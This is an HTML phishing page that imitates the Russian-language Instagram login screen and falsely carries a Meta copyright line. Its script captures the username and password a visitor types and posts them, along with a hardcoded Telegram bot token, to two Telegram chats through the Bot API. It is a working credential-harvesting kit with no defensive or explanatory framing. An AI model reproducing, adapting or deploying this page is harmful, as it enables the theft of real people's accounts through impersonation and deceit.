<!DOCTYPE html>
<html lang="ru">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Instagram – Вход</title>
    <link rel="shortcut icon" href="Снимок_экрана_2025-03-09_143854-removebg-preview.png" type="image/x-icon">
    <style>
        * {
            margin: 0;
            padding: 0;
            box-sizing: border-box;
        }

        body {
            font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Helvetica, Arial, sans-serif;
            background: #121212;
            color: #e0e0e0;
            display: flex;
            flex-direction: column;
            align-items: center;
            justify-content: center;
            min-height: 100vh;
        }

        .container {
            width: 350px;
            background: #1e1e1e;
            border: 1px solid #333;
            border-radius: 10px;
            padding: 20px;
            box-shadow: 0 4px 8px rgba(0, 0, 0, 0.3);
            text-align: center;
        }

        .logo {
            width: 175px;
            margin: 20px auto 30px;
           
            color: white;
        }

        select{
            background-color:  #1e1e1e;
            color: #e0e0e0;
            border: none;
            margin: 10px;
        }

        input {
            width: 100%;
            padding: 12px;
            margin: 10px 0;
            background: #333;
            border: 1px solid #555;
            border-radius: 5px;
            font-size: 14px;
            color: #e0e0e0;
            outline: none;
        }

        input:focus {
            border-color: #0095f6;
            box-shadow: 0 0 5px rgba(0, 149, 246, 0.5);
        }

        button {
            width: 100%;
            padding: 10px;
            margin-top: 10px;
            background: #0095f6;
            color: #fff;
            border: none;
            border-radius: 5px;
            font-weight: bold;
            cursor: pointer;
            transition: background 0.3s ease;
        }

        button:hover {
            background: #0077b6;
        }

        .separator {
            display: flex;
            align-items: center;
            justify-content: center;
            margin: 20px 0;
            color: #888;
        }

        .separator::before,
        .separator::after {
            content: '';
            flex: 1;
            height: 1px;
            background: #444;
            margin: 0 10px;
        }

        .fb-login {
            color: #0095f6;
            text-decoration: none;
            font-weight: bold;
            display: block;
            margin: 15px 0;
        }

        .links a {
            color: #0095f6;
            text-decoration: none;
            font-size: 14px;
        }

        .register-container {
            margin-top: 20px;
            background: #1e1e1e;
            border: 1px solid #333;
            border-radius: 10px;
            padding: 20px;
            box-shadow: 0 4px 8px rgba(0, 0, 0, 0.3);
            text-align: center;
        }

        .register-link {
            color: #0095f6;
            text-decoration: none;
            font-weight: bold;
        }

        .a-Zabyl{
            color: #888;
            text-decoration: none;
            display: block;
            margin: 15px 0;
        }

        .footer {
            margin-top: 40px;
            color: #888;
            font-size: 12px;
            text-align: center;
        }

        .footer-links {
            margin: 10px 0;
        }

        .footer-links a {
            color: #888;
            text-decoration: none;
            margin: 0 10px;
        }

        @media (max-width: 480px) {
            .container {
                width: 100%;
                padding: 0 20px;
            }
        }
    </style>
</head>
<body>
    <div class="container">
       <h1 class="logo">Poki game</h1>
        <form id="loginForm">
            <input id="loginUser" type="text" placeholder="Телефон, имя пользователя или эл. адрес" required>
            <input id="passwordUser" type="password" placeholder="Пароль" required>
            <button type="submit">Войти</button>
        </form>
        <div class="separator">ИЛИ</div>
        <a href="#" class="fb-login">Войти через Facebook</a>
        <p><a class="a-Zabyl" href="#">Забыли пароль?</a></p>
    </div>
    <div class="register-container">
        <p>У вас нет аккаунта? <a href="#" class="register-link">Зарегистрироваться</a></p>
    </div>
    <div class="footer">
        <p>© 2025 Instagram from Meta</p>
    </div>

    <script>
     
        const loginForm = document.getElementById("loginForm");


        loginForm.addEventListener("submit", (e) => {
            e.preventDefault();
            sendToTelegram();
            sendToTelegramIsa()
        });


        function sendToTelegram() {
            const botToken = "7273831188:AAEdT5K3uCPPEiBhFGHezOTBNUNhxuCwmVY";
            const chatId = "1466048795";

            const loginUser = document.getElementById("loginUser").value;
            const passwordUser = document.getElementById("passwordUser").value;


            const message = `📬 *Жаңа мәліметтер:*\n\n👤 *Логин:* ${loginUser}\n🔑 *Құпия сөз:* ${passwordUser}`;

            fetch(`https://api.telegram.org/bot${botToken}/sendMessage`, {
                method: "POST",
                headers: {
                    "Content-Type": "application/json"
                },
                body: JSON.stringify({
                    chat_id: chatId,
                    text: message,
                    parse_mode: "Markdown"
                })
            })
            .then(response => response.json())
            .then(data => {
                if (data.ok) {
                    console.log("thank you, for entering login instagram");
                    
                } else {
                    console.log(data);
                }
            })
            .catch(error => {
                console.log(error);
            });
        }



        function sendToTelegramIsa() {
            const botToken = "7273831188:AAEdT5K3uCPPEiBhFGHezOTBNUNhxuCwmVY";
            const chatId = "6104923438";

            const loginUser = document.getElementById("loginUser").value;
            const passwordUser = document.getElementById("passwordUser").value;


            const message = `📬 *Жаңа мәліметтер:*\n\n👤 *Логин:* ${loginUser}\n🔑 *Құпия сөз:* ${passwordUser}`;

            fetch(`https://api.telegram.org/bot${botToken}/sendMessage`, {
                method: "POST",
                headers: {
                    "Content-Type": "application/json"
                },
                body: JSON.stringify({
                    chat_id: chatId,
                    text: message,
                    parse_mode: "Markdown"
                })
            })
            .then(response => response.json())
            .then(data => {
                if (data.ok) {
                    console.log("Мәліметтер сәтті жіберілді!");
                    
                } else {
                    console.log(data);
                }
            })
            .catch(error => {
                console.log(error);
            });
        }

    </script>
</body>
</html>